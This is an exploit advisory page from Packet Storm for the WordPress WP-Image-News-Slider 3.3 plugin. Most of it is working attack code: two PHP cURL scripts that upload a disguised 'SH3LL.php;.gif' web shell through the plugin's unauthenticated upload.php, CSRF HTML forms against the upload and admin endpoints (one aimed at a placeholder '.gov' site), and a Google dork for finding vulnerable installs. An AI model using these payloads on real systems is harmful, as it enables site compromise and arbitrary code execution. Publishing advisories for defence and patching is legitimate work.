what you don't know can hurt you

WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload

WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload
Posted Mar 5, 2019
Authored by KingSkrupellos

WordPress WP-Image-News-Slider plugin version 3.3 suffers from cross site request forgery and remote shell upload vulnerabilities.

tags | exploit, remote, shell, vulnerability, csrf
MD5 | 565786e871040f0759e592f8d15a7c02

WordPress WP-Image-News-Slider 3.3 Cross Site Request Forgery / Shell Upload

Change Mirror Download
##################################################################################

# Exploit Title : WordPress WP-Image-News-Slider Plugins 3.3 CSRF Shell Upload
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 05/03/2019
# Vendor Homepage : wpslideshow.com
# Software Information Link : wpslideshow.com/newsimage-slider/
# Software Affected Versions : 3.0 ~ 3.1 ~ 3.2 ~ 3.3 ~ 3.5
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wp-image-news-slider/"
# Vulnerability Type :
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

##################################################################################

# Description about Software :
***************************
Image News slider is a plugin that allow us to display slideshow on your website.

* Customizable gallery width and gallery height
* Image description
* Customizable Text display panel width
* Customizable auto play time
* Transition Time
* Customizable slide interval
* Customizable scalling

##################################################################################

# Impact :
**********
WordPress WP-Image-News-Slider Plugins 3.3 and other versions is prone to an arbitrary

file upload vulnerability. An attacker may leverage this issue to upload arbitrary files to the

affected computer; this can result in arbitrary code execution within the context of the vulnerable application.

Weaknesses in this category are related to the management of permissions, privileges,

and other security features that are used to perform access control.

##################################################################################

Installation Video from Vendor =>
*******************************
youtube.com/watch?feature=player_embedded&v=DQ-rIX8Akug

== Installation ==

1. Install automatically through the `Plugins`, `Add New` menu in WordPress, or

upload the `wp-image-news-slider` folder to the `/wp-content/plugins/` directory.

2. Activate the plugin through the `Plugins` menu in WordPress. you can find

"Slider" link on left side navigation, click on to configure plugin Options.

##################################################################################

Direct Access Exploit 1 :
***********************
/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php

Vulnerability Error :
******************
No upload found in $_FILES for Filedata - Security word error.

Note : We have to use CSRF or PHP Exploiter for successfull exploitation.

Exploit 2 :
*********
/wp-admin/admin.php?page=image-news-slider_manage

Vulnerability Error :
******************
WP_Error Object ( [errors] => Array ( [image_no_editor] =>
Array ( [0] => No editor could be selected. ) )
[error_data] => Array ( ) ) Error

# Directory File Path :
********************
/wp-content/uploads/image-news-slider/2_uploadfolder/big/.......

/wp-content/uploads/image-news-slider/30_uploadfolder/big/.....

/wp-content/uploads/image-news-slider/[ID-NUMBER]_uploadfolder/big/.......

/wp-content/plugins/wp-image-news-slider/js/swfupload/......

/wp-content/uploads/.....

##################################################################################

Exploit :
*******

# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 1 :
****************************************************************

<?php

$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";

?>

##################################################################################

# PHP Backdoor Access / Shell Upload / Arbitrary File Upload Exploiter 2 :
****************************************************************
<?php
$uploadfile="SH3LL.php;.gif";
$ch = curl_init("http://[VULNERABLEWEBSITE]/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access : http://[VULNERABLEWEBSITE]/[PATH]/wp-content/plugins/wp-image-news-slider/js/swfupload/....
<?php
phpinfo();
?>

##################################################################################

Cross Site Request Forgery CSRF Exploiter 1 =>
******************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/wp-image-news-slider/js/swfupload/js/upload.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

##################################################################################

Cross Site Request Forgery CSRF Exploiter 2 =>
******************************************
<html>
<body>
<form action="http://[VULNERABLEWEBSITE]/wp-admin/admin.php?page=image-news-slider_manage" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="slider_add_new_album" />
<input type="hidden" name="album_name" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="hidden" name="album_desc" value="Arbitrary File Upload for WordPress WP-Image-News-Slider" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

##################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

##################################################################################

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

March 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    15 Files
  • 2
    Mar 2nd
    5 Files
  • 3
    Mar 3rd
    3 Files
  • 4
    Mar 4th
    25 Files
  • 5
    Mar 5th
    20 Files
  • 6
    Mar 6th
    16 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    12 Files
  • 9
    Mar 9th
    3 Files
  • 10
    Mar 10th
    4 Files
  • 11
    Mar 11th
    23 Files
  • 12
    Mar 12th
    12 Files
  • 13
    Mar 13th
    12 Files
  • 14
    Mar 14th
    19 Files
  • 15
    Mar 15th
    12 Files
  • 16
    Mar 16th
    3 Files
  • 17
    Mar 17th
    1 Files
  • 18
    Mar 18th
    15 Files
  • 19
    Mar 19th
    22 Files
  • 20
    Mar 20th
    14 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    10 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    0 Files
  • 26
    Mar 26th
    0 Files
  • 27
    Mar 27th
    0 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close